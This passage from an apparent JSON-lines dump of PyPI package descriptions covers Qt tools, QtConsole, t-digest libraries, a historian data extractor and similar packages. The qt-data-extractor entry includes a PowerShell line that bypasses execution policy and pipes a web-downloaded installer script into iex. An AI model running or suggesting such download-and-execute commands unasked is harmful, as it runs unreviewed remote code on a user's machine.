This repositoryis no longer maintained by the author!All functionality of the library has been tested by me, but if you have problems using it, the code does not work, have suggestions for optimization or advice for improving the style of the code and the name - I invite youhereandhere.ContentAuthorsKalynovsky Valentin\"Ideological inspirer and Author\""} +{"package": "qt-command-palette", "pacakge-description": "qt-command-paletteA command palette widget for Qt applications.\nThis module provides a Pythonic way to register command actions to any Qt widgets.Installationpip install qt-command-paletteUsageRegister functions usingregisterfunction.fromqt_command_paletteimportget_palette# create command palette instance (with optional app name as an argument)palette=get_palette(\"myapp\")# prepare a command groupgroup=palette(\"Command group 1\")# This function will be shown as \"Command group 1: run_something\"@group.registerdefrun_something():...# This function will be shown as \"Command group 1: Run some function\"@group.register(desc=\"Run some function\")defrun_something():...Install command palette into Qt widget.# instantiate your own widgetqwidget=MyWidget()# install command palette, with optional shortcutpalette.install(qwidget,\"Ctrl+Shift+P\")qwidget.show()"} +{"package": "qtcompat", "pacakge-description": "qtcompatA compatibility package to allow usage of PySide2, PyQt5 or PySide6\nin Python applications. It has been written\ninOGSto allow our Python applications written in PyQt4 / PySide to migrate slowly\nto PyQt5 / Pyside2 and PySide6.Install qtcompatRun command:pip3 install qtcompatFor the bleeding edge install with:pip3 install git+https://bitbucket.org/bvidmar/qtcompatUsageWhen writing a new package import all the modules required by it in\nitsinit.py file:from qtcompat import (Signal, QtCore, Qt, QtGui, QtWidgets, LIB, \n QAction, QShortcut)and then import only the Qt modules needed by every new module from .To write a single scrpit simply import the required modules fromqtcompat:from qtcompat import QtCore, QtGui, QtWidgetsWrite applications using:- QtCore\n- QtGui\n- QtWidgets\n- QtOpenGL\n- Signal\n- Slot\n- Property\n- QOpenGLWidget\n- QGLFormat\n- QAction\n- QShortcut\n- Qt (shortcut for QtCore.Qt)and the application will work with any of PySide2, PyQt5 or PySide6.If more than one of these packages are installedqtcompatwill pick\nthe first one available inthisorder. To change this behaviour set the environment\nvariableQT_PREFERRED_LIB=PyQt5orQT_PREFERRED_LIB=PySide6The selected package name will be available in the LIB attribute ofqtcompat.Who do I talk to?Roberto VidmarNicola Creati"} +{"package": "qtconfig", "pacakge-description": "QConfigQConfig is a useful tool for PyQt GUI developers, as it makes it easier to save and load the state of the GUI through configuration files. This tool simplifies the process of preserving the current state of the GUI, and provides a range of helpful methods for managing configuration, making it a convenient and efficient solution.How to installQConfig is available on pypi and can be installed via pip.pipinstallqtconfigIntroductionThe concept behind the package is aQConfigcontainer that takes responsibility for a dictionary of data. Each key in the dictionary gets aHookassigned, which maps the value to its widget.For datasets with keys that do not match the widget names, aQConfigDynamicLoadercan be created, mapping each value to its widget, and then passed to theQConfigconstructor. 
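For a quick feel of how these pieces fit together, here is a minimal, hypothetical sketch (the qtconfig import is left as a comment because the exact import path is not stated here, and the widget set-up and object names are illustrative assumptions rather than documented API; the constructor calls themselves mirror the usage section below):
# Hypothetical sketch only -- import location and widget choices are assumptions.
# from qtconfig import QConfig, QConfigDynamicLoader  # assumed import path
from PyQt5.QtWidgets import QApplication, QLineEdit, QSpinBox

app = QApplication([])

data = {"user_name": "Jake", "age": 18}

# Two widgets; the first one's objectName() does not match its data key.
name_edit = QLineEdit()
name_edit.setObjectName("user")
age_spin = QSpinBox()
age_spin.setObjectName("age")

# Bridge the mismatching key to its widget name and pass the loader to QConfig,
# mirroring the calls shown in the usage section of this description.
loader = QConfigDynamicLoader({"user_name": "user"}, show_build=True)
cfg = QConfig(data, [name_edit, age_spin], loader, recursive=False)

cfg.load_data()   # populate the hooked widgets from the dict
cfg.get_data()    # write the current widget values back into the dict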
It is also able to receive a list of keys instead and look for the closest matching widget name.FeaturesLoad all the values aQConfigis responsible for from their hooked widgetsPopulate all the widgets with the values aQConfigs' data holdsAdd callbacks to the widgets aQConfigholdsRemove specific / all callbacks aQConfigholdsTrigger a \"save on change\" for all widgets aQConfigholdsDynamically map config keys to non matching widget object namesSuppress expected errors while trying to buildQConfigDynamicLoaderorQConfigLoad or read datasets recursively to allow for nested configsConvertstrfrom config intoQDateobjectsWhy should you use it?Preserving the state of a GUI in files such as json, yaml or xml yourself can be tedious and results in a lot of boilerplate code. Each widget needs to be connected to the data that holds its value and vice versa, you need to add callbacks to all widgets to invoke a save (unless you want to use a save button or timer) and it takes alot of time, increases the amount of code and increases the risk of getting something wrong. QConfig uses a more sophisticated method of handling the configs for you and allows you to focus on your GUI design rather than worrying about preserving its state.UsageQConfig is very lightweight and intuitive to use, more-so when the configs keys already match the widget names.With matching key - widget pairsThe most straightforward way to use QConfig is to ensure that your configuration keys match the widget names in your GUI. Assuming we have the following structure:user_data:dict[str,Any]={\"user_name\":\"Jake\",\"age\":18,\"of_age\":True,\"IQ\":10}widgets:list[QWidget]=[user_name_widget,age_widget,of_age_checkbox,iq_spinbox]Assuming that eachwidget.objectName()matches the key it is hooked to in the configs, you can create a QConfig just like this:user_data_qconfig=QConfig(user_data,widgets,recursive=False)With QConfigDynamicLoaderThe QConfigDynamicLoader allows you to dynamically hook a dataset to the widgets even if the keys dont match, by guiding the loader to the widget to search for.\nTaking the above example:user_data:dict[str,any]={\"user_name\":\"Jake\",\"age\":18,\"of_age\":True,\"IQ\":10}widgets:list[QWidget]=[user_name_widget,age_widget,of_age_checkbox,iq_spinbox]Assuming theobjectName()properties ofuser_name_widgetandage_widgetwere actually\"user\"and\"age\"instead, we could create a QConfigDynamicLoader to account for this:loader=QConfigDynamicLoader({\"user_name\":\"user\",\"age_widget\":\"age\"},show_build=True)user_data_qconfig=QConfig(user_data,widgets,loader,recursive=False)AQConfigDynamicLoaderis also able to automatically complement keys by close matches, either keys missing in the data or passed as a list. If part of your keys already match with the widget names, they do not need to be added to the loader, the QConfig will find them before accessing the loader.FeaturesUpon initialisation, it will build hooks that connect each key to its respective widget. Now we can use the qconfig object to......populate the hooked widgets with the values in the datauser_data_qconfig.load_data()...save the values in the widgets in its key in the datauser_data_qconfig.get_data()...connect callback methods to each widget's change event. 
With this method when a value in a widget is changed, all the settings will be written to the data right upon changeuser_data_qconfig.connect_callback(user_data_qconfig.save_data)...disconnect the callbacks, remove a specified callback by passing one, otherwise all callbacks are disconnecteduser_data_qconfig.disconnect_callback(exclude=[\"user_name\"])"} +{"package": "qtconsole", "pacakge-description": "Jupyter QtConsoleA rich Qt-based console for working with Jupyter kernels,\nsupporting rich media output, session export, and more.The Qtconsole is a very lightweight application that largely feels like a terminal, but\nprovides a number of enhancements only possible in a GUI, such as inline\nfigures, proper multiline editing with syntax highlighting, graphical calltips,\nand more.Install QtconsoleThe Qtconsole requires Python bindings for Qt, such asPyQt6,PySide6,PyQt5orPySide2.Althoughpipandcondamay be used to install the Qtconsole, conda\nis simpler to use since it automatically installs PyQt5. Alternatively,\nthe Qtconsole installation with pip needs additional steps since pip doesn't install\nthe Qt requirement.Install using condaTo install:conda install qtconsoleNote:If the Qtconsole is installed using conda, it willautomaticallyinstall the Qt requirement as well.Install using pipTo install:pip install qtconsoleNote:Make sure that Qt is installed. Unfortunately, Qt is not\ninstalled when using pip. The next section gives instructions on doing it.Installing Qt (if needed)You can install PyQt5 with pip using the following command:pip install pyqt5or with a system package manager on Linux. For Windows, PyQt binary packages may be\nused.Note:Additional information about using a system package manager may be\nfound in theqtconsole documentation.More installation instructions for PyQt can be found in thePyQt5 documentationandPyQt4 documentationSource packages for Windows/Linux/MacOS can be found here:PyQt5andPyQt4.UsageTo run the Qtconsole:jupyter qtconsoleResourcesProject Jupyter websiteDocumentation for the Qtconsolelatest version[PDF]stable version[PDF]Documentation for Project Jupyter[PDF]IssuesTechnical support - Jupyter Google Group"} +{"package": "qtcurate", "pacakge-description": "Quantxt Theia Python client libraryThe officialQuantxtPython client library.Theia is a fully managed document extraction software. User needs to first configure the fields that they want to extract. Theia guarantees correct extraction of data if the fields are configured properly. Fields can be embedded in plain text, within tables or within forms.Theia can process documents in various formats including PDF, TIFF, PNG, JPEG, TSV, TXT and Ms Excel. Scanned documents are automatically detected and run through OCR before extraction.InstallationRequirementsPython 3.6 or laterInstallationpip install qtcurateRefer to theSamplesfor examplesOfficial documentationContact us atsupport@quantxt.comfor API key or technical questions."} +{"package": "qt-custom", "pacakge-description": "Custom Qt Classes"} +{"package": "qt-custom-widgets", "pacakge-description": "QT-PyQt-PySide-Custom-WidgetsAwesome custom widgets made for QT Desktop Applications. Simplify your UI development process. 
These widgets can be used in QT Designer then imported to PySide code.InstallationFirst time installer:pip install QT-Custom-WidgetsUpgrade/install the latest version:pip install --upgrade QT-Custom-WidgetsInstallation TestingRun the following code to see if the installation was successful.# Run this from your terminal or create a python file,# paste this code, then runfromCustom_Widgets.ProgressIndicatorimporttesttest.main()You should see the following interface:How to use it.Read the full documentation plus video guideshereWatch the tutorial videos hereWhat is new?Version 0.6.2:Added support for loading multipleJSON StylesheetsBy default, the json file namedstyle.jsonwill be loaded, so no need to specify. The file must me inside the root directory of your project,jsondirectory, orjsonstylesdirectory inside your project folder for it to be automatically loaded.If you have multiple JSON stylesheet files, then you can apply them to your GUI like this:######################################################################### APPLY JSON STYLESHEET######################################################################### self = QMainWindow class# self.ui = Ui_MainWindow / user interface classloadJsonStyle(self,self.ui,jsonFiles={\"mystyle.json\",\"mydirectory/myJsonStyle.json\"})########################################################################This feature is helpful especially when you have multiple windows files that will share only some parts of the stylesheet shuch app app title, settings etc.Toggle logs:\nYou can now switch app logs on or off.\nThis can be done from a python file:# Show Logsself.showCustomWidgetsLogs=True# Hide Logsself.showCustomWidgetsLogs=FalseFrom the JSON file:{\"ShowLogs\":true,{\"ShowLogs\":false,Sample ImagesAnalog Gauge WidgetResponsive Animated GUIAnimated QStacked Widget"} +{"package": "qtdata", "pacakge-description": "qtdataqtdata\u662f\u7531\u4e2a\u4eba\u6253\u9020\u7684\u7528\u4e8e\u83b7\u53d6A\u80a1\u3001\u6e2f\u7f8e\u80a1\u3001\u671f\u8d27\u3001\u533a\u5757\u94fe\u6570\u636e\u7684\u514d\u8d39\u5f00\u6e90 Python \u5e93\uff0c\u5b83\u7edf\u4e00\u9002\u914d\u5404\u79cd\u91cf\u5316\u6570\u636e\u6e90\uff0c\u8f93\u51fapandas\u683c\u5f0f\u6570\u636e\uff0c\u65e2\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528\uff0c\u4e5f\u53ef\u4ee5\u4ece\u672c\u5730\u884c\u60c5\u6570\u636e\u5e93\u5b58\u53d6\uff0c \u4f7f\u7528\u5b83\u4f60\u53ef\u4ee5\u5f88\u65b9\u4fbf\u5730\u83b7\u53d6\u6570\u636e\u800c\u4e0d\u7528\u5bf9\u63a5\u5404\u79cd\u6570\u636e\u6e90\u3002\u80cc\u666f\u91cf\u5316\u6570\u636e\u6e90\u4f17\u591a\uff0c\u53c2\u8003https://github.com/rchardzhu/awesome-quant-cn\u91d1\u878d\u6570\u636e\u662f\u91cf\u5316\u7684\u57fa\u7840\uff0c\u6ca1\u6709\u6570\u636e\u91cf\u5316\u5c31\u65e0\u4ece\u4e0b\u624b\u3002\u968f\u7740\u884c\u4e1a\u7ade\u4e89\u52a0\u5267\uff0c\u91cf\u5316\u5bf9\u9ad8\u8d28\u91cf\u2014\u66f4\u5feb\u66f4\u5168\u66f4\u51c6\u6570\u636e\u7684\u8981\u6c42\u66f4\u9ad8\uff0c\u6bd5\u7adf\u641e\u91cf\u5316\u4e0d\u80fd\u8f93\u5728\u8d77\u8dd1\u7ebf\u4e0a\u3002\n\u5404\u79cd\u6570\u636e\u6e90\u683c\u5f0f\u5404\u4e0d\u76f8\u540c\uff0cqtdata\u5e0c\u671b\u80fd\u591f\u628a\u5404\u79cd\u6570\u636e\u6e90\u7edf\u4e00\u8d77\u6765\uff0c\u5927\u5bb6\u53ea\u9700\u8981\u6309\u7167qtdata 
lib\u5e93\u5c31\u597d\u3002\nqtdata\u9884\u8ba1\u5b9e\u73b0\u7684\u529f\u80fd\uff1a\u9002\u914d\u5404\u7c7b\u6570\u636e\u6e90\uff0c\u5bf9\u91cf\u5316\u611f\u5174\u8da3\u7684\u540c\u5b66\u53ea\u4f7f\u7528\u4e00\u5957\u4ee3\u7801\u5e93\u5c31\u53ef\u4ee5\u4f7f\u7528\u5404\u79cd\u6570\u636e\u8f93\u51fa\u4e3apandas\u683c\u5f0f\uff0c\u65b9\u4fbf\u76f4\u63a5\u4f7f\u7528\u53ef\u4ee5\u5b58\u50a8\u5230\u672c\u5730\u884c\u60c5\u5e93\uff0c\u4e5f\u53ef\u4ee5\u4ece\u672c\u5730\u884c\u60c5\u5e93\u8bfb\u53d6\u5b89\u88c5\u901a\u8fc7pip\u5b89\u88c5pipinstallqtdata\u901a\u8fc7pip\u66f4\u65b0pipinstallqtdata--upgrade\u91cf\u5316\u6570\u636e\u6e90\u5206\u7c7b\u91cf\u5316\u6570\u636e\u6e90\u5206\u4e3a\u5982\u4e0b\u51e0\u79cd\uff1a \u5f00\u6e90\u91cf\u5316\u6570\u636e\u3001\u5238\u5546/\u91cf\u5316\u4ea4\u6613\u5e73\u53f0\u63d0\u4f9b\u7684\u6570\u636e\u6e90\u3001\u4e13\u4e1a\u6570\u636e\u670d\u52a1\u516c\u53f8\u548c\u81ea\u5df1\u6293\u53d6\u6e05\u6d17\u51e0\u79cd\u65b9\u5f0f\u3002\u5f00\u6e90\u91cf\u5316\u6570\u636e\uff1a\u901a\u8fc7\u6293\u53d6\u5404\u7c7b\u8d22\u7ecf\u7f51\u7ad9\u6216\u516c\u5f00\u7684\u91d1\u878d\u6570\u636e\uff0c\u8fdb\u884c\u6e05\u6d17\u52a0\u5de5\u5b58\u50a8\u540e\u5f00\u653e\u51fa\u6765\uff0c\u4e3a\u91cf\u5316\u5b66\u4e60\u8005\u63d0\u4f9b\u91d1\u878d\u6570\u636e\u9700\u6c42\u3002 \u5982BaoStock, tushare, akshare, yfinance, easyquotation, efinance\u5238\u5546/\u91cf\u5316\u4ea4\u6613\u5e73\u53f0\uff1a \u805a\u5bbd\u6570\u636eJQData, rqdata, tqsdk, futu\u4e13\u4e1a\u6570\u636e\u670d\u52a1\u516c\u53f8\uff1a\u4e07\u5f97Wind Data Service\u6570\u636e\u670d\u52a1, ifind, choice\u6570\u636e, \u5f6d\u535abloomberg\u6570\u636e\u670d\u52a1\u81ea\u5df1\u6293\u53d6&\u6e05\u6d17\u6570\u636e\uff1a\u7f16\u7a0b\u80fd\u529b\u597d\u4e14\u6709\u65f6\u95f4\u7684\u670b\u53cb\uff0c\u4e5f\u53ef\u4ee5\u81ea\u5df1\u6293\u53d6\u548c\u6e05\u6d17\u6570\u636e\u3002\u597d\u5904\u662f\u6570\u636e\u8d28\u91cf\u6709\u4fdd\u969c\uff0c\u53ef\u4ee5\u6309\u7167\u81ea\u5df1\u8981\u6c42\u6765\u8fdb\u884c\u5904\u7406\uff1b\u7f3a\u70b9\u662f\u5bf9\u7f16\u7a0b\u80fd\u529b\u6709\u4e00\u5b9a\u8981\u6c42\uff0c\u4e14\u6bd4\u8f83\u8d39\u65f6\u95f4\u4eba\u529b\u3002\u6bd4\u8f83\u5e38\u89c1\u7684\u662f\u5bf9\u7279\u5b9a\u6570\u636e\u5f53\u4e0a\u9762\u7684\u6570\u636e\u6e90\u65e0\u6cd5\u8986\u76d6\u65f6\uff0c\u53ef\u4ee5\u81ea\u5df1\u6293\u53d6\u8865\u5145\u3002\u4ea4\u6d41\u73b0\u5728\u5404\u79cd\u91cf\u5316\u6570\u636e\u6e90\u4e94\u82b1\u516b\u95e8\uff0c\u53d1\u73b0\u5f88\u591a\u670b\u53cb\u5bf9\u8fd9\u5757\u4e0d\u662f\u5f88\u6e05\u695a\uff0c\u4e2a\u4eba\u4e5f\u5728\u4e0a\u9762\u82b1\u4e86\u4e0d\u5c11\u65f6\u95f4\uff0c\u5e0c\u671b\u80fd\u8ddf\u5927\u5bb6\u4e00\u8d77\u5171\u540c\u4f18\u5316qtdata\uff0c\u611f\u5174\u8da3\u7684\u670b\u53cb\u53ef\u4ee5\u52a0\u7fa4\u4e00\u8d77\u4ea4\u6d41\u3002 \u5173\u6ce8\u516c\u4f17\u53f7\u83b7\u53d6\u9080\u8bf7\u94fe\u63a5\uff0c\u5fae\u4fe1\u516c\u4f17\u53f7\uff1a\u8bf8\u845b\u8bf4talk\n\u52a0\u7fa4\u798f\u5229\uff1a\u53ef\u4ee5\u4e00\u8d77\u4ea4\u6d41\u60f3\u6cd5\u53ef\u4ee5\u4e00\u8d77\u8d21\u732e\u4ee3\u7801\u53ef\u4ee5\u4f18\u5148\u5f00\u53d1\u60f3\u8981\u7684\u529f\u80fd\u53ef\u4ee5\u89e3\u51b3\u6280\u672f\u96be\u9898"} +{"package": "qt-data-extractor", "pacakge-description": "Industrial Data ExtractorIndustrial Data Extractor is an open-source Windows application to extract process data from industrial systems\nand historians.The following systems are currently supported:Osisoft PIIt supports browsing and selecting tags on the target system and extract periods of data into zipped 
CSVs.InstallationPlease usehttps://github.com/imubit/qt-data-extractor/releasesto download the latest version of the extractor.If you would like to extract data from Osisoft PI historian (which is the only one supported at this point). Please\nmake sure you havePI SDKand AF SDK installed and configured on your workstation.Getting StartedConfigure the target historian usingServerdrop down.Using left panel filter editor to browse for tags or import an Excel sheet with a list of tags.Select tags you would like to extract on left panel and add then to the right panel withAdd to Selected Tagsbutton.Select a period to be extracted and sample rate (useRaw Dataoption to extract the original sample rate that is stored within the historian).SelectSave Directoryin which your archive will be populated.ClickExtractand confirm your selection.Wait until extraction is finished.DevelopmentPython Installpipinstallqt-data-extractorRunning under CLIPS C:\\> qt-data-extractorIf the application is not starting this way, Python Scripts directory is probably not in the PATH. In this case you can run the script from Python installation directory (i.e.c:\\Python\\Python39\\Scripts\\qt-data-extractor.exe)Building Windows Executablepipxruntox-ewinexeBuilding MSI InstallerInstall environmentSet-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))\nchoco install -y go-msiBuild MSIgo-msi make --msi dist\\windows-msi\\ --version 0.1.1"} +{"package": "qt-dataflow", "pacakge-description": "This package tries to provide components for building your own\nvisual programming environment. The authors aim is to make his\ndata analysis tool available to his colleagues who don\u2019t\nknow programming or Python.Because a standard gui is not very flexible, this projects tries\nto make visual canvas on which the dataflow can be defined and modified.\nExtensibility is given through simply adding or modifying Nodes.This project is inspired by Orange - where i did not see an easy way to just\nuse the canvas part (also: license differences). Also the design tries\nto be more flexible.RequirementsIt is made with Python 2.7. Not tested for lower versions or\nPython 3 (patches welcome). It should work with PySide and PyQt,\nbut at the moment, the imports need to be manually changed.The examples may have additional requirements:numpymatplotlibpyqtgraphExamplesSee example.py for an simple example using icons which react to double click.\nTo make a connection draw from one nodes termial to another\n(only out-> in is allowed).example_widget uses widgets on the canvas directly, it also implements\na simple callback. Note how the label updates after changing the\nSpinBox-value.example_pyqtgraph need also the pyqtgraph package. It plot directly on the\ncanvas.example_matplotlib_on_canvas does the same, but uses matplotlib via\na temporary file.Code ExampleTo make custom nodes you need to subclass Node. It must return\na NodeView via its \u2018get_view\u2019 method. The following example\nimplements a Node which make a random number.classRandomNumber(Node):\"\"\"\n A test node which outputs a random number. 
Widget allow to set the number.\n \"\"\"def__init__(self):super(DataGenNode,self).__init__()#Node type/nameself.node_type='Random Array'#Icon_path is needed for the PixmapNodeViewself.icon_path='icons/onebit_11.png'#The makes the node have an output terminal.self.generates_output=Truedefget_view(self):returnPixmapNodeView(self)defget(self):#Method which can be called by other nodes. The name is just#a convention.num=[random.random()foriinrange(self.num_points)]returnnumdefshow_widget(self):#Method called by double clicking on the icon.int,ok=Qt.QtGui.QInputDialog.getInteger(None,'Input Dialog','Number of Points',self.num_points)ifok:self.num_points=intA node saves its connections in node.in_conn and node.out_conn. Also\nnote, that each node view must be a child of a QGraphicsItem and NodeView.StructureIn model the base Node- and Schema-classes are found. In view are some\nview available. gui contains some additional ready to use elements.Todoadd different icons (simple)nicer toolbar (drag-n-drop would be nice)test persistence, define a stable protocol if pickling does not workmake an example with less requirements.checking and introducing a connection typemove some logic for allowing or denying connections\nfrom SchemaView to the NodeView.checking and improving compatibility with different Python versions.better documentationmake number of terminals variable.\u2026Coding StyleThis projects tries to follow PEP8.LicenseExample icons are fromhttp://www.icojam.com/blog/?p=177(Public Domain).BSD - 3 clauses, see license.txt."} +{"package": "qtdata-setupserver-and-tool", "pacakge-description": "No description available on PyPI."} +{"package": "qtdatasetviewer", "pacakge-description": "Qt Dataset ViewerThis module is for debugging ML projects. It is PyQt5 based viewer for torch.utils.dataset.InstallationUse the package managerpipto installqtdatasetviewerfrom PyPi.pipinstallqtdatasetviewerUsageimportsysfromglobimportglobfromdatasetimportSampleDatasetfromPyQt5.QtWidgetsimportQApplicationfromPILimportImagefromqtdatasetviewer.abstract_convert_to_pilimportAbstractConvertToPilfromqtdatasetviewer.qt_dataset_viewerimportrun_qt_dataset_viewerimporttorchvision.transformsasTclassConvert(AbstractConvertToPil):defconvert(self,item)->Image:image,mask=itemtransform=T.ToPILImage()returntransform(image)if__name__==\"__main__\":dataset=SampleDataset(files=glob(\"data/*.*\"))run_qt_dataset_viewer(Convert(dataset))DisclaimerThe package and the code is provided \"as-is\" and there is NO WARRANTY of any kind.\nUse it only if the content and output files make sense to you."} +{"package": "qt-desktop-translate", "pacakge-description": "qt-desktop-translateqt-desktop-translate allows translating .desktop files using .ts files from Qt.InstallationInstall qt-desktop-translate with pippip install qt-desktop-translateCreate translationsTo create translations, use desktop-lupdatedesktop-lupdate your_desktop_file.desktop your_ts_file.tsThis will add the fields from the .desktop file to the .ts file. Now you can use Qt Linguist or any other tool, that allows translating .ts files. Call desktop-lupdate everytime after you've ran the normal lupdate. You can specify a folder instead of a single .ts file.Apply translationsTo apply translations, use desktop-lreleasedesktop-lrelease your_desktop_file.desktop output.desktop your_ts_file.tsThis will translate desktop-lupdate your_desktop_file.desktop using the translations from your_ts_file.ts. The output will be written into output.desktop. 
You can specify a folder instead of a single .ts file."} +{"package": "qt-dev-helper", "pacakge-description": "Qt Dev HelperToolbox to help develop Qt applications, improving the usability of the existing tooling.Installationpip install qt-dev-helperORconda install -c conda-forge qt-dev-helperFeaturesUsable as Library and/or CLI toolCompatible withPEP517build system\n(see test case)CLI auto completionProject wide configuration inpyproject.tomlRecursive asset compiler for Qt projects (usinguicandrcc):*.ui->*.py*.qrc->*.py*.ui->*.h*.qrc->*.h*.scss->*.qssSupport for multiple Qt tooling suppliersPySide6-Essentialsqt6-applicationsqt5-applicationsAbility to open all files in a folder in QtDesignerPlanned featuresStand alone executable for each release (Windows)File watch modeqssinjection into*.uifilespre-commithooksFAQQ: Why isPyQt5not supported?A:PyQt5only ships a python specific version ofuicandrccbreaking the tool API and\ncompatibility with cpp projects.\nUse the matching version ofqt5-applicationsas Qt tooling supplier.Contributors \u2728Thanks goes out to these wonderful people (emoji key):Sebastian Weigand\ud83d\udcbb\ud83e\udd14\ud83d\udea7\ud83d\udcc6\ud83d\ude87\u26a0\ufe0f\ud83d\udcd6Joris Snellenburg\ud83d\udc40This project follows theall-contributorsspecification. Contributions of any kind are welcome!"} +{"package": "qtdigest", "pacakge-description": "qtdigestpython implementation of Dunning's T-Digest, inspired bynodejs tdigestInstallpipinstallqtdigestUsagefromqtdigestimportTdigestt=Tdigest()foriinxrange(1000):t.push(random())P90=t.percentile(0.9)print'P90 = ',P90APITdigest(delta=0.01, K=25, CX=1.1)delta: the compression factor, the max fraction of mass that can be owned by one centroid (bigger, up to 1.0, means more compression).K: a size threshold that triggers recompression as the TDigest grows during inputCX: specifies how often to update cached cumulative totals used for quantile estimation during ingest.return: Tdigest instanceInstance of Tdigestpush(x, n): add data with value x and weight nsize(): return the count of centroidstoList(): return the list of all centroids datapercentile(p): return the percentage of p(0..1)serialize(): serialize tdigest instance to string, ie:0.01~25~2~0.00064~0.0013~2~20simpleSerialize(): simply serialize tdigest instance to string, ie:0.00064~2~0.0013~20deserialize(serialized_str): deserialize the serialized string to tdigest instance. it is a classmethod, so can be called byTdigest.deserialize(serialized_str)Performanceplatform\uff1a MacBook Pro (2.6 GHz Intel Core i5)data size (push times)cost time1K0.07s10K0.2s100K1.7s1M17s"} +{"package": "qtdigest-cffi", "pacakge-description": "t-digest CFFIt-digestis a data structure\nfor accurate on-line accumulation of rank-based statistics such as\nquantiles and trimmed means, designed byTed\nDunning.The t-digest construction algorithm uses a variant of 1-dimensional\nk-means clustering to produce a data structure that is related to the\nQ-digest. This t-digest data structure can be used to estimate quantiles\nor compute other rank statistics. The advantage of the t-digest over the\nQ-digest is that the t-digest can handle floating point values while the\nQ-digest is limited to integers. With small changes, the t-digest can\nhandle any values from any ordered set that has something akin to a\nmean. 
The accuracy of quantile estimates produced by t-digests can be\norders of magnitude more accurate than those produced by Q-digests in\nspite of the fact that t-digests are more compact when stored on disk.This package provides tested, performant, thread-safePython 3CFFI\nbindings to an adapted implementation of t-digest byUsman\nMasoodoriginally written forredis-tdigest.InstallationYou can install this package usingpipor the includedsetup.pyscript:# Using pip\npip install tdigest-cffi\n\n# Using setup.py\npython setup.py installUsagefromtdigestimportTDigest,RawTDigest# Thread-safe instance with default compression factordigest=TDigest()# Raw instance with default compression factordigest=RawTDigest()# Thread-safe instance with a custom compression factordigest=TDigest(compression=500)# Digest compressioncompression=digest.compression# Digest weightweight=digest.weight# Centroid countcentroid_count=digest.centroid_count# Compression countcompression_count=digest.compression_count# Insertion with unit weightdigest.push(1000)# Insertion with custom weightdigest.push(1000,2)# 99th percentile calculationquantile=digest.quantile(0.99)percentile=digest.percentile(99)# Cumulative distribution functioncdf=digest.cdf(1000)# P(X <= 1000)# Centroid extractionforcentroidindigest.centroids():print(centroid.mean,centroid.weight)# Digest mergingother=TDigest()other.push(42)digest.merge(other)LicenseBSD 3-Clause License\n\nCopyright (c) 2018, Phil Demetriou\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\n* Neither the name of the copyright holder nor the names of its\n contributors may be used to endorse or promote products derived from\n this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."} +{"package": "qtdjango", "pacakge-description": "UNKNOWN"} +{"package": "qtdptools", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "qtdraw", "pacakge-description": "QtDraw3D drawing tool for molecules and crystals based onPyVistaandQt.\nDrawings are associated with crystallographic symmetry operations provided byMultiPie.Authors: Hiroaki KusunoseCiting QtDraw and MultiPie: If you are using QtDraw and/or MultiPie in your scientific research, please help our scientific visibility by citing our work:Hiroaki Kusunose, Rikuto Oiwa, and Satoru Hayami, Symmetry-adapted modeling for molecules and crystals, Phys. Rev. B107, 195118 (2023).DOI:https://doi.org/10.1103/PhysRevB.107.195118Installation: QtDraw can be installed from PyPI using pip on Python >= 3.9:pip install qtdrawIt is useful to associate with the following application with.qtdwand.cifextension.MacWindowsYou can also visitPyPIorGitHubto download the source.See also,Install Guide (in Japanese)Shell commandqtdraw [filename]is available.Requirements:This library requiresTeXLiveenvironment.Symmetry operation supports are provided byMultiPie.See also:Manual (QtDraw and MultiPie).MyST syntax cheat sheetMultiPie tutorial (in Japanese)QtDraw tutorial (in Japanese)"} +{"package": "qte", "pacakge-description": "UNKNOWN"} +{"package": "qtealeaves", "pacakge-description": "qtealeavesThe qtealeaves library of Quantum TEA contains tensor network representation as\npython classes, e.g., MPS, TTN, LPTN, and TTO. qtealeaves is the API for building\nquantum models in Quantum TEA and has for example a single-tensor update ground state\nsearch for TTNs. Moreover, qtealeaves is backbone for running quantum circuits via\nQuantum matcha TEA and the frontend for the fortran backend running Quantum Green TEA,\ni.e., solving the Schr\u00f6dinger equation.DocumentationHereis the documentation. The documentation can also be built locally via sphinx.LicenseThe projectqtealeavesis hosted at the repositoryhttps://baltig.infn.it/quantum_tea_leaves/py_api_quantum_tea_leaves.git,\nand is licensed under the following license:Apache License 2.0The license applies to the files of this project as indicated\nin the header of each file, but not its dependencies.InstallationIndependent of the use-case, you have to install the dependencies. Then,\nthere are the options using it as a stand-alone package, withinquantum\nmatcha TEA, or for quantum green TEA.Local installation via pipThe package is available via PyPi andpip install qtealeaves.\nAfter cloning the repository, an local installation via pip is\nalso possible viapip install ..DependenciesThe python dependencies can be found in therequirements.txtand are required independently of the following use-cases.Stand-alone packageIf you are looking to explore small exact diagonalization examples,\nwant to run a single-tensor update ground state search with TTNs,\nor have TN-states on files to be post-processed, you are ready 